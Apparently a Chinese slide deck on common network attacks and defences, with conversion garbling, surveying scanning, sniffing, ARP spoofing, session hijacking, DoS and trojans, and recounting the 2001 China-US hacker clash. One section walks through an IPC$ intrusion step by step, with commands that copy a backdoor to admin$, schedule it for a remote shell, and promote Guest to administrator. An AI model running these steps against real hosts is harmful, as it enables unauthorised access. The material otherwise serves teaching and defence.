常見網(wǎng)絡(luò)攻擊與防范

常見網(wǎng)絡(luò)攻擊與防范提綱常見的網(wǎng)絡(luò)攻擊方法常用的平安防范措施常見的網(wǎng)絡(luò)攻擊方法19801985199019952000密碼猜測可自動復(fù)制的代碼密碼破解利用的漏洞破壞審計系統(tǒng)后門會話劫持擦除痕跡嗅探包欺騙GUI遠(yuǎn)程控制自動探測掃描拒絕效勞www攻擊工具攻擊者入侵者水平攻擊手法半開放隱蔽掃描控制臺入侵檢測網(wǎng)絡(luò)管理DDOS攻擊2002高入侵技術(shù)的開展采用漏洞掃描工具選擇會用的方式入侵獲取系統(tǒng)一定權(quán)限提升為最高權(quán)限安裝系統(tǒng)后門獲取敏感信息或者其他攻擊目的入侵系統(tǒng)的常用步驟端口判斷判斷系統(tǒng)選擇最簡方式入侵分析可能有漏洞的效勞獲取系統(tǒng)一定權(quán)限提升為最高權(quán)限安裝多個系統(tǒng)后門去除入侵腳印攻擊其他系統(tǒng)獲取敏感信息作為其他用途較高明的入侵步驟2001年中美黑客大戰(zhàn)事件背景和經(jīng)過4.1撞機(jī)事件為導(dǎo)火線4月初，以PoizonB0x、pr0phet為代表的美國黑客組織對國內(nèi)站點進(jìn)行攻擊，約300個左右的站點頁面被修改4月下旬，國內(nèi)紅〔黑〕客組織或個人，開始對美國網(wǎng)站進(jìn)行小規(guī)模的攻擊行動，4月26日有人發(fā)表了“五一衛(wèi)國網(wǎng)戰(zhàn)〞戰(zhàn)前聲明，宣布將在5月1日至8日，對美國網(wǎng)站進(jìn)行大規(guī)模的攻擊行動。各方都得到第三方支援各大媒體紛紛報道，評論，中旬結(jié)束大戰(zhàn)PoizonB0x、pr0phet更改的網(wǎng)頁中經(jīng)網(wǎng)數(shù)據(jù)有限公司中國科學(xué)院心理研究所國內(nèi)某政府網(wǎng)站國內(nèi)某大型商業(yè)網(wǎng)站國內(nèi)黑客組織更改的網(wǎng)站頁面美國勞工部網(wǎng)站美國某節(jié)點網(wǎng)站美國某大型商業(yè)網(wǎng)站美國某政府網(wǎng)站這次事件中采用的常用攻擊手法紅客聯(lián)盟負(fù)責(zé)人在5月9日網(wǎng)上記者新聞發(fā)布會上對此次攻擊事件的技術(shù)背景說明如下：“我們更多的是一種不滿情緒的發(fā)泄，大家也可以看到被攻破的都是一些小站，大局部都是NT/Win2000系統(tǒng)，這個行動在技術(shù)上是沒有任何炫耀和炒作的價值的。〞主要采用當(dāng)時流行的系統(tǒng)漏洞進(jìn)行攻擊這次事件中被利用的典型漏洞用戶名泄漏，缺省安裝的系統(tǒng)用戶名和密碼Unicode編碼可穿越firewall,執(zhí)行黑客指令A(yù)SP源代碼泄露可遠(yuǎn)程連接的數(shù)據(jù)庫用戶名和密碼SQLserver缺省安裝微軟Windows2000登錄驗證機(jī)制可被繞過Bind遠(yuǎn)程溢出，Lion蠕蟲SUNrpc.sadmind遠(yuǎn)程溢出，sadmin/IIS蠕蟲Wu-Ftpd格式字符串錯誤遠(yuǎn)程平安漏洞拒絕效勞(syn-flood,ping)這次事件中被利用的典型漏洞用戶名泄漏，缺省安裝的系統(tǒng)用戶名和密碼入侵者利用黑客工具掃描系統(tǒng)用戶獲得用戶名和簡單密碼這次事件中被利用的典型漏洞Windows2000登錄驗證機(jī)制可被繞過常見的平安攻擊方法直接獲取口令進(jìn)入系統(tǒng)：網(wǎng)絡(luò)監(jiān)聽，暴力破解利用系統(tǒng)自身平安漏洞特洛伊木馬程序：偽裝成工具程序或者游戲等誘使用戶翻開或下載，然后使用戶在無意中激活，導(dǎo)致系統(tǒng)后門被安裝WWW欺騙：誘使用戶訪問纂改正的網(wǎng)頁電子郵件攻擊：郵件炸彈、郵件欺騙網(wǎng)絡(luò)監(jiān)聽：獲取明文傳輸?shù)拿舾行畔⑼ㄟ^一個節(jié)點來攻擊其他節(jié)點：攻擊者控制一臺主機(jī)后，經(jīng)常通過IP欺騙或者主機(jī)信任關(guān)系來攻擊其他節(jié)點以隱蔽其入侵路徑和擦除攻擊證據(jù)拒絕效勞攻擊和分布式拒絕效勞攻擊(和)IP地址、主機(jī)是否運(yùn)行、到要入侵點的路由、主機(jī)操作系統(tǒng)與用戶信息等。獲取信息1.收集主機(jī)信息

Ping命令判斷計算機(jī)是否開著，或者數(shù)據(jù)包發(fā)送到返回需要多少時間

Tracert/Tracerout命令跟蹤從一臺計算機(jī)到另外一臺計算機(jī)所走的路徑

Finger和Rusers命令收集用戶信息

Host或者Nslookup命令，結(jié)合Whois和Finger命令獲取主機(jī)、操作系統(tǒng)和用戶等信息

應(yīng)用的方法：獲取網(wǎng)絡(luò)效勞的端口作為入侵通道。2.端口掃瞄1.TCPConnect() 2.TCPSYN3.TCPFIN 4.IP段掃瞄5.TCP反向Ident掃瞄 6.FTP代理掃瞄7.UDPICMP不到達(dá)掃瞄 7種掃瞄類型：NSS〔網(wǎng)絡(luò)平安掃描器〕，可執(zhí)行Sendmail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常規(guī)檢查。Strobe(超級優(yōu)化TCP端口檢測程序)，可記錄指定機(jī)器上的所有開放端口，快速識別指定機(jī)器上運(yùn)行的效勞，提示可以被攻擊的效勞。SATAN(平安管理員的網(wǎng)絡(luò)分析工具)，SATAN用于掃描遠(yuǎn)程主機(jī)，發(fā)現(xiàn)漏洞，包括FTPD漏洞和可寫的FTP目錄，NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X效勞器漏洞等。Jakal掃描器，可啟動而不完成TCP連接，因此可以掃描一個區(qū)域而不留下痕跡。IdengTCPscan掃描器，可識別指定TCP端口的進(jìn)程的UID。掃瞄軟件舉例：3.Sniffer掃瞄原理：sniffer類的軟件能把本地網(wǎng)卡設(shè)置成工作在“混雜〞〔promiscuous〕方式，使該網(wǎng)卡能接收所有數(shù)據(jù)幀，從而獲取別人的口令、金融帳號或其他敏感機(jī)密信息等。方法與對策：1、用交換機(jī)替換HUB，交換機(jī)是兩兩接通，比普通HUB平安。2、使用檢測的軟件，如CPMAntisniff等，檢測網(wǎng)絡(luò)中是否有網(wǎng)卡工作在混雜狀態(tài)〔根本原理是發(fā)送本網(wǎng)中并不存在的MAC地址，看看是否有回應(yīng)，如有回應(yīng)，那么說明有計算機(jī)網(wǎng)卡工作在混雜模式?！?。一次利用ipc$的入侵過程1.C:\>netuse\\x.x.x.x\IPC$“〞/user:“admintitrators〞

用?流光?掃到的用戶名是administrators，密碼為“空〞的IP地址2.C:\>copysrv.exe\\x.x.x.x\admin$

先復(fù)制srv.exe上去，在流光的Tools目錄下3.C:\>nettime\\x.x.x.x

查查時間，發(fā)現(xiàn)x.x.x.x的當(dāng)前時間是2003/3/19上午11:00，命令成功完成。

4.C:\>at\\x.x.x.x11:05srv.exe

用at命令啟動srv.exe吧〔這里設(shè)置的時間要比主機(jī)時間推后〕

5.C:\>nettime\\x.x.x.x

再查查時間到了沒有，如果x.x.x.x的當(dāng)前時間是2003/3/19上午11:05，那就準(zhǔn)備開始下面的命令。

6.C:\>telnetx.x.x.x99

這里會用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對方計算機(jī)中為我們建立一個99端口的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet效勞！這就要用到ntlm了

一次利用ipc$的入侵過程7.C:\>copyntlm.exe\\\admin$

ntlm.exe也在?流光?的Tools目錄中

8.C:\WINNT\system32>ntlm

輸入ntlm啟動〔這里的C:\WINNT\system32>是在對方計算機(jī)上運(yùn)行當(dāng)出現(xiàn)“DONE〞的時候，就說明已經(jīng)啟動正常。然后使用“netstarttelnet〞來開啟Telnet效勞，接著輸入用戶名與密碼就進(jìn)入對方了

為了方便日后登陸,將guest激活并加到管理組

10.C:\>netuserguest/active:yes

11.C:\>netuserguest1234

將Guest的密碼改為1234

12.C:\>netlocalgroupadministratorsguest/add

將Guest變?yōu)锳dministrator網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)網(wǎng)絡(luò)竊聽是指通過截獲他人網(wǎng)絡(luò)上通信的數(shù)據(jù)流，并非法從中提取重要信息的一種方法間接性

利用現(xiàn)有網(wǎng)絡(luò)協(xié)議的一些漏洞來實現(xiàn)，不直接對受害主機(jī)系統(tǒng)的整體性進(jìn)行任何操作或破壞隱蔽性

網(wǎng)絡(luò)竊聽只對受害主機(jī)發(fā)出的數(shù)據(jù)流進(jìn)行操作，不與主機(jī)交換信息，也不影響受害主機(jī)的正常通信網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——共享式局域網(wǎng)下共享式局域網(wǎng)采用的是播送信道，每一臺主機(jī)所發(fā)出的幀都會被全網(wǎng)內(nèi)所有主機(jī)接收到一般網(wǎng)卡具有以下四種工作模式：播送模式、多播模式、直接模式和混雜模式網(wǎng)卡的缺省工作模式是播送模式和直接模式，即只接收發(fā)給自己的和播送的幀網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——共享式局域網(wǎng)下使用MAC地址來確定數(shù)據(jù)包的流向 假設(shè)等于自己的MAC地址或是播送MAC地址，那么提交給上層處理程序，否那么丟棄此數(shù)據(jù)當(dāng)網(wǎng)卡工作于混雜模式的時候，它不做任何判斷，直接將接收到的所有幀提交給上層處理程序共享式網(wǎng)絡(luò)下竊聽就使用網(wǎng)卡的混雜模式網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——共享式局域網(wǎng)下網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——交換式局域網(wǎng)下在數(shù)據(jù)鏈路層，數(shù)據(jù)幀的目的地址是以網(wǎng)卡的MAC地址來標(biāo)識ARP協(xié)議實現(xiàn)<IP—MAC>的配對尋址ARP請求包是以播送的形式發(fā)出，正常情況下只有正確IP地址與的主機(jī)才會發(fā)出ARP響應(yīng)包，告知查詢主機(jī)自己的MAC地址。局域網(wǎng)中每臺主機(jī)都維護(hù)著一張ARP表，其中存放著<IP—MAC>地址對。網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——交換式局域網(wǎng)下ARP改向的中間人竊聽A發(fā)往B：(MACb，MACa， PROTOCOL，DATA)B發(fā)往A：(MACa，MACb， PROTOCOL，DATA)A發(fā)往B：(MACx，MACa， PROTOCOL，DATA)B發(fā)往A：(MACx，MACb， PROTOCOL，DATA)網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——交換式局域網(wǎng)下X分別向A和B發(fā)送ARP包，促使其修改ARP表主機(jī)A的ARP表中B為<IPb—MACx>主機(jī)B的ARP表中A為<IPa—MACx>X成為主機(jī)A和主機(jī)B之間的“中間人〞網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——網(wǎng)絡(luò)竊聽的被動防范

分割網(wǎng)段

細(xì)化網(wǎng)絡(luò)會使得局域網(wǎng)中被竊聽的可能性減小

使用靜態(tài)ARP表

手工輸入<IP—MAC>地址對

采用第三層交換方式

取消局域網(wǎng)對MAC地址、ARP協(xié)議的依賴，而采用基于IP地址的交換加密

SSH、SSL、IPSec網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——網(wǎng)絡(luò)竊聽的主動防范共享式局域網(wǎng)下的主動防范措施偽造數(shù)據(jù)包 構(gòu)造一個含有正確目標(biāo)IP地址和一個不存在目標(biāo)MAC地址——各個操作系統(tǒng)處理方式不同，一個比較好的MAC地址是FF-FF-FF-FF-FF-FE性能分析 向網(wǎng)絡(luò)上發(fā)送大量包含無效MAC地址的數(shù)據(jù)包，竊聽主時機(jī)因處理大量信息而導(dǎo)致性能下降網(wǎng)絡(luò)監(jiān)聽及防范技術(shù)

——網(wǎng)絡(luò)竊聽的主動防范交換式局域網(wǎng)下的主動防范措施監(jiān)聽ARP數(shù)據(jù)包 監(jiān)聽通過交換機(jī)或者網(wǎng)關(guān)的所有ARP數(shù)據(jù)包，與預(yù)先建立的數(shù)據(jù)庫相比較定期探測數(shù)據(jù)包傳送路徑 使用路徑探測程序如tracert、traceroute等對發(fā)出數(shù)據(jù)包所經(jīng)過的路徑進(jìn)行檢查，并與備份的合法路徑作比較使用SNMP定期輪詢ARP表

IP欺騙及防范技術(shù)

——會話劫持一般欺騙會話劫持IP欺騙及防范技術(shù)

——會話劫持會話劫持攻擊的根本步驟發(fā)現(xiàn)攻擊目標(biāo)確認(rèn)動態(tài)會話猜測序列號 關(guān)鍵一步，技術(shù)難點使被冒充主機(jī)下線 偽造FIN包，拒絕效勞攻擊接管會話IP欺騙及防范技術(shù)

——會話劫持猜測序列號TCP區(qū)分正確數(shù)據(jù)包和錯誤數(shù)據(jù)包僅通過它們的SEQ/ACK序列號選擇恰當(dāng)時間，在數(shù)據(jù)流中插入一個欺騙包，效勞器將接受這個包，并且更新ACK序列號；然而客戶主機(jī)仍繼續(xù)使用老的SEQ序列號，而沒有覺察我們的欺騙包IP欺騙及防范技術(shù)——防范技術(shù)沒有有效的方法可以從根本上防范會話劫持攻擊所有會話都加密保護(hù)——實現(xiàn)困難使用平安協(xié)議〔SSH、VPN〕——保護(hù)敏感會話對網(wǎng)絡(luò)數(shù)據(jù)流采取限制保護(hù)措施——被動措施電子郵件欺騙及防范技術(shù)

——案例2003年6月初，一些在中國工商銀行進(jìn)行過網(wǎng)上銀行注冊的客戶，收到了一封來自網(wǎng)絡(luò)管理員的電子郵件，宣稱由于網(wǎng)絡(luò)銀行系統(tǒng)升級，要求客戶重新填寫用戶名和密碼。這一舉動隨后被工行工作人員發(fā)現(xiàn)，經(jīng)證實是不法分子冒用網(wǎng)站公開信箱，企圖竊取客戶的資料。雖然沒有造成多大的損失，但是這宗典型的電子郵件欺騙案例當(dāng)時曾在國內(nèi)平安界和金融界掀起了軒然大波，刺激人們針對信息平安問題展開了更加深切的討論。電子郵件欺騙及防范技術(shù)

——原理發(fā)送郵件使用SMTP〔即簡單郵件傳輸協(xié)議〕SMTP協(xié)議的致命缺陷：過于信任原那么SMTP假設(shè)的依據(jù)是：不疑心郵件的使用者的身份和意圖偽裝成為他人身份向受害者發(fā)送郵件可以使用電子郵件客戶端軟件，也可以遠(yuǎn)程登錄到25端口發(fā)送欺騙郵件電子郵件欺騙及防范技術(shù)

——防范查看電子郵件頭部信息 不僅指出了是否有人欺騙了電子郵件，而且指出了這個信息的來源采用SMTP身份驗證機(jī)制 使用與POP協(xié)議收取郵件時相同的用戶名/密碼PGP郵件加密 以公鑰密碼學(xué)〔PublicKeyCryptology〕為根底的Web欺騙及防范技術(shù)

——概念人們利用計算機(jī)系統(tǒng)完成具有平安需求的決策時往往是基于屏幕的顯示頁面、URL圖標(biāo)、圖片時間的先后順序攻擊者創(chuàng)造一個完整的令人信服的Web世界，但實際上它卻是一個虛假的復(fù)制攻擊者控制這個虛假的Web站點，受害者瀏覽器和Web之間所有網(wǎng)絡(luò)通信完全被攻擊者截獲Web欺騙及防范技術(shù)

——概念Web欺騙及防范技術(shù)

——原理URL地址改寫

://@:///攻擊者改寫Web頁中的所有URL地址，使它們指向攻擊者的Web效勞器不是真正的Web效勞器<user>:<password>@<host>:<port>/<url-path>Web欺騙及防范技術(shù)

——原理欺騙過程用戶單擊經(jīng)過改寫后的；:///向:///請求文檔；:///向:///返回文檔；:///改寫文檔中的所有URL；:///向用戶返回改寫后的文檔Web欺騙及防范技術(shù)

——原理隱藏紕漏由于JavaScript能夠?qū)B接狀態(tài)欄寫操作，而且可以將JavaScript操作與特定事件綁定在一起。攻擊者完全可以將改寫的URL狀態(tài)恢復(fù)為改寫前的狀態(tài)。JavaScript、ActiveX等技術(shù)使Web欺騙變得更為可信。

Web欺騙及防范技術(shù)

——防范技術(shù)檢查頁面的源代碼禁用JavaScrip、ActiveX等腳本語言確保應(yīng)用有效和能適當(dāng)?shù)馗櫽脩?會話ID使用盡可能長的隨機(jī)數(shù)教育是非常重要的口令攻擊方法與對策：1、限制同一用戶的失敗登錄次數(shù)2、限制口令最短長度，要求特權(quán)指令使用復(fù)雜的字母、數(shù)字組合。3、定期更換口令，不要將口令存放到計算機(jī)文件中1口令暴力攻擊：生成口令字典，通過程序試探口令。2竊取口令文件后解密：竊取口令文件〔UNIX環(huán)境下的Passwd文件和Shadow文件〕，通過軟件解密。CGI漏洞攻擊原理：1.有些CGI程序只是簡單地進(jìn)行傳遞，不對內(nèi)容進(jìn)行過濾，攻擊者就可能通過頁面提交帶有危險指令的腳本代碼提交給機(jī)器去執(zhí)行。2.有些CGI能夠過濾一些特征數(shù)據(jù)，但是有些攻擊者成心制作一些混亂的字符串騙過檢測〔如使用退格字符〕。3.有些管理員把CGI所在的目錄設(shè)置為可寫的，那么攻擊者不僅可以修改替換頁面，而且也可以通過新腳本為所欲為。對策：嚴(yán)格設(shè)置CGI腳本權(quán)限，采用平安的CGI。漏洞攻擊FTP漏洞攻擊漏洞1：對使用的端口號沒有任何限制，可以使用TCP提供給其他效勞的任意端口，這就使攻擊者利用FTP攻擊其他效勞。FTP效勞器被當(dāng)作攻擊武器使用了。防范措施是設(shè)置效勞器最好不要建立端口號在1024以下的連接，其次禁止FTP代理。漏洞2：FTP標(biāo)準(zhǔn)允許無限次輸入密碼。防范措施是建議效勞器限制嘗試輸入正確指令的次數(shù)，另外在一次登錄失敗后應(yīng)暫停幾秒來削減暴力攻擊的有效性。漏洞3：分配端口號時，通常按增序分配。防范措施是讓系統(tǒng)改為使用隨機(jī)分配端口號的方法。緩沖區(qū)溢出攻擊在c語言中，下面程序?qū)⒃斐删彌_區(qū)溢出：charbuffer[10];strcpy(buffer,str);或者Sprintf(buffer,〞thisisatest.〞);后果：普通的緩沖區(qū)溢出并不會產(chǎn)生平安問題，只有將溢出送到能夠以root權(quán)限運(yùn)行命令的區(qū)域才會產(chǎn)生危害，最常見的方法是在溢出區(qū)域運(yùn)行一個shell，再通過shell執(zhí)行其他的命令。對策：經(jīng)常注意升級版本或下載補(bǔ)丁。例如：IISISAPI.Printer的緩沖區(qū)溢出攻擊軟件：://://補(bǔ)?。簉elease.asp?ReleaseID=29321拒絕效勞攻擊〔DoS〕SYN（我可以連接嗎？）ACK（可以）/SYN（請確認(rèn)?。┕粽呤芎φ邆卧斓刂愤M(jìn)行SYN請求為何還沒回應(yīng)就是讓你白等不能建立正常的連接拒絕效勞攻擊利用系統(tǒng)缺陷攻擊OOB攻擊耗盡連接攻擊利用放大原理Smurf攻擊利用放大系統(tǒng)攻擊分布式拒絕效勞攻擊DDoS1.OOB攻擊〔OutofBand〕原理：攻擊者是利用Windows下微軟網(wǎng)絡(luò)協(xié)定NetBIOS的一個例外處理程序OOB〔OutofBand〕的漏洞。只要有人以O(shè)OB的方式，通過TCP/IP傳遞一個小小的包到某個IP地址的某個開放的受端上〔一般為139〕。對象：使沒有防護(hù)或修訂的win95/nt系統(tǒng)瞬間當(dāng)機(jī)。工具：Ssping、Teardrop(淚滴)、Trin00、Targe3這些攻擊都是利用系統(tǒng)的漏洞，因此補(bǔ)救的方法是升級或下載補(bǔ)丁對策2.耗盡連接攻讀LAND攻擊：向被攻擊者發(fā)送一個個源地址和目標(biāo)地址都被設(shè)置成為被攻擊者的地址的SYN包，導(dǎo)致被攻擊者自己與自己建立一個空連接，直到超時。TCP/SYN攻擊：攻擊者向目標(biāo)主機(jī)不斷發(fā)送帶有虛假源地址的SYN包，目標(biāo)主機(jī)發(fā)送ACK/SYN回應(yīng)，因為源地址是虛假的，所以不會收到ACK回應(yīng)，導(dǎo)致消耗大量資源等待ACK上，直止系統(tǒng)資源耗盡。這些攻擊都是利用系統(tǒng)的漏洞，因此補(bǔ)救的方法是升級或下載補(bǔ)丁對策Smurf攻擊攻擊者用播送的方式發(fā)送回復(fù)地址為受害者地址的ICMP請求數(shù)據(jù)包，每個收到這個數(shù)據(jù)包的主機(jī)都進(jìn)行回應(yīng)，大量的回復(fù)數(shù)據(jù)包發(fā)給受害者，導(dǎo)致受害主機(jī)崩潰。Smurf攻擊原理利用放大系統(tǒng)攻擊某些類型的操作系統(tǒng)，在一定情況下，對一個請求所返回的信息比請求信息量大幾十倍〔如Macintosh〕，攻擊者偽裝成目標(biāo)主機(jī)進(jìn)行請求，導(dǎo)致大量數(shù)據(jù)流發(fā)向目標(biāo)主機(jī)，加重了攻擊效果。DoS攻擊技術(shù)——DDoS技術(shù)分布式拒絕效勞攻擊攻擊者在客戶端通過telnet之類的常用連接軟件，向(master)主控端發(fā)送發(fā)送對目標(biāo)主機(jī)的攻擊請求命令。主控端(master)偵聽接收攻擊命令，并把攻擊命令傳到分布端，分布端是執(zhí)行攻擊的角色，收到命令立即發(fā)起flood攻擊。DDoS攻擊原理特洛伊木馬木馬不同于病毒，但經(jīng)常被視作病毒處理，隨計算機(jī)自動啟動并在某一端口進(jìn)行偵聽；木馬的實質(zhì)只是一個通過端口進(jìn)行通信的網(wǎng)絡(luò)客戶/效勞程序特洛伊木馬的種類遠(yuǎn)程控制型輸出shell型信息竊取型其它類型Netbus客戶端程序NetBus傳輸NetBus使用TCP建立會話。缺省情況下用12345端口進(jìn)行連接，12346端口進(jìn)行數(shù)據(jù)傳輸跟蹤NetBus的活動比較困難?？梢酝ㄟ^檢查12346端口數(shù)據(jù)來確定許多類似的程序使用固定的端口，你可以掃描整個的網(wǎng)絡(luò)監(jiān)測可疑的活動。簡單方法netstat-an反彈型特洛伊木馬可穿透防火墻，控制局域網(wǎng)機(jī)器效勞器端主動發(fā)起連接，控制端監(jiān)聽80端口自動上線通知Email發(fā)送讀取主頁空間的某個文件網(wǎng)絡(luò)神偷、灰鴿子、魔法控制解決方法安裝防病毒軟件和個人防火墻檢查可疑的進(jìn)程和監(jiān)聽端口提高平安警惕性TCP/IP的每個層次都存在攻擊TelnetSMTPDNSFTPUDPTCPIP以太網(wǎng)無線網(wǎng)絡(luò)SATNETARPNET應(yīng)用程序攻擊拒絕服務(wù)攻擊數(shù)據(jù)監(jiān)聽和竊取硬件設(shè)備破壞電磁監(jiān)聽混合型、自動的攻擊

WorkstationViaEmailFileServerWorkstationMailServerInternet混合型攻擊:蠕蟲WebServerViaWebPageWorkstationWebServerMailGateway攻擊的開展趨勢防病毒防火墻入侵檢測風(fēng)險管理攻擊的開展趨勢漏洞趨勢嚴(yán)重程度中等或較高的漏洞急劇增加,新漏洞被利用越來越容易(大約60%不需或很少需用代碼)混合型威脅趨勢將病毒、蠕蟲、特洛伊木馬和惡意代碼的特性與效勞器和Internet漏洞結(jié)合起來而發(fā)起、傳播和擴(kuò)散的攻擊,例：紅色代碼和尼姆達(dá)等。主動惡意代碼趨勢制造方法：簡單并工具化技術(shù)特征：智能性、攻擊性和多態(tài)性,采用加密、變換、插入等技術(shù)手段巧妙地偽裝自身，躲避甚至攻擊防御檢測軟件.表現(xiàn)形式：多種多樣,沒有了固定的端口，沒有了更多的連接,甚至開展到可以在網(wǎng)絡(luò)的任何一層生根發(fā)芽，復(fù)制傳播，難以檢測。受攻擊未來領(lǐng)域即時消息：MSN,Yahoo,ICQ,OICQ等對等程序(P2P)移動設(shè)備常見的平安防范措施常用的平安防范措施物理層網(wǎng)絡(luò)層路由交換策略VLAN劃分防火墻、隔離網(wǎng)閘入侵檢測抗拒絕效勞傳輸加密系統(tǒng)層漏洞掃描系統(tǒng)平安加固SUS補(bǔ)丁平安管理應(yīng)用層防病毒平安功能增強(qiáng)管理層獨立的管理隊伍統(tǒng)一的管理策略

訪問控制

認(rèn)證

NAT

加密

防病毒、內(nèi)容過濾流量管理常用的平安防護(hù)措施－防火墻入侵檢測系統(tǒng)FirewallInternetServersDMZIDSAgentIntranet監(jiān)控中心router攻擊者發(fā)現(xiàn)攻擊發(fā)現(xiàn)攻擊發(fā)現(xiàn)攻擊報警報警IDSAgent漏洞掃描系統(tǒng)Internet地方網(wǎng)管scanner監(jiān)控中心地方網(wǎng)管地方網(wǎng)管地方網(wǎng)管地方網(wǎng)管市場部工程部router開發(fā)部InternetServersFirewall漏洞掃描產(chǎn)品應(yīng)用系統(tǒng)平安加固根本平安配置檢測和優(yōu)化密碼系統(tǒng)平安檢測和增強(qiáng)系統(tǒng)后門檢測提供訪問控制策略和工具增強(qiáng)遠(yuǎn)程維護(hù)的平安性文件系統(tǒng)完整性審計增強(qiáng)的系統(tǒng)日志分析系統(tǒng)升級與補(bǔ)丁安裝Windows系統(tǒng)平安加固使用Windowsupdate安裝最新補(bǔ)?。桓拿艽a長度最小值、密碼最長存留期、密碼最短存留期、帳號鎖定計數(shù)器、帳戶鎖定時間、帳戶鎖定閥值，保障帳號以及口令的平安；卸載不需要的效勞；將暫時不需要開放的效勞停止；限制特定執(zhí)行文件的權(quán)限；設(shè)置主機(jī)審核策略；調(diào)整事件日志的大小、覆蓋策略；禁止匿名用戶連接；刪除主機(jī)管理共享；限制Guest用戶權(quán)限；安裝防病毒軟件、及時更新病毒代碼庫；安裝